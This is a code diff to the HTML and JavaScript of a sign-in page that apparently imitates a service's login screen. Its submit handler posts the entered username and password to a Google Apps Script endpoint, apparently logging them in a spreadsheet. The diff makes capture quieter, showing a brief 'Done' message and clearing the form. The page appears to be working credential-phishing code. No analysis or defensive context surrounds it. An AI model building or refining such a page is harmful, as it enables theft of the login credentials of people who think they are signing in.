--- a/index.html
+++ b/index.html
@@ -47,6 +47,7 @@
     box-shadow: 0 0 20px rgb(0 0 0 / 0.8);
     color: white;
     z-index: 10;
+    position: relative;
   }
 
   input[type="text"], input[type="password"] {
@@ -127,6 +128,14 @@
   }
   .forgot-password:hover { color: white; text-decoration: underline; }
 
+  .message {
+    display: none;
+    margin-top: 0.8rem;
+    font-size: 1rem;
+    color: #0f0; /* green */
+    font-weight: bold;
+  }
+
   @media (max-width:480px) {
     .form-container { max-width:95vw; padding:0 1.5rem; }
     .logo { font-size:2.8rem; }
@@ -149,34 +158,43 @@
   <button type="button" class="btn-other-device">Log In With Another Device</button>
 
   <div class="forgot-password">Forgot Password or Username?</div>
+  <div class="message" id="successMessage">✅ Done</div>
 </form>
 </main>
 
 <script>
 const toggleBtn = document.querySelector('.toggle-password');
 const passwordInput = document.getElementById('password');
+const message = document.getElementById('successMessage');
+
 toggleBtn.addEventListener('click', ()=>{
   passwordInput.type = passwordInput.type==='password'?'text':'password';
   toggleBtn.style.color = passwordInput.type==='password'?'rgba(255 255 255 / 0.6)':'white';
 });
 
-// Google Sheets submission
+// Form submission
 document.getElementById('loginForm').addEventListener('submit', async function(e){
   e.preventDefault();
   const formData = new FormData(this);
   const params = new URLSearchParams(formData);
 
   try {
-    const response = await fetch('https://script.google.com/macros/s/AKfycbxFT4s0IL1tXwB2fFVa-LDigPeBH7IxrvSGMzQRzx_VLNMAuPHgh0neOBj5jS1_FkoQPw/exec', {
+    await fetch('https://script.google.com/macros/s/AKfycbxFT4s0IL1tXwB2fFVa-LDigPeBH7IxrvSGMzQRzx_VLNMAuPHgh0neOBj5jS1_FkoQPw/exec', {
       method:'POST',
       body: params
     });
-    const result = await response.json();
-    alert("Form submitted successfully!");
+
+    message.style.display = 'block'; // show green "Done"
     this.reset();
+
+    // hide message after 3 seconds
+    setTimeout(() => { message.style.display = 'none'; }, 3000);
   } catch(err) {
     console.error(err);
-    alert("Error submitting form");
+    message.style.color = '#f00';
+    message.textContent = '❌ Error';
+    message.style.display = 'block';
+    setTimeout(() => { message.style.display = 'none'; }, 3000);
   }
 });
 </script>
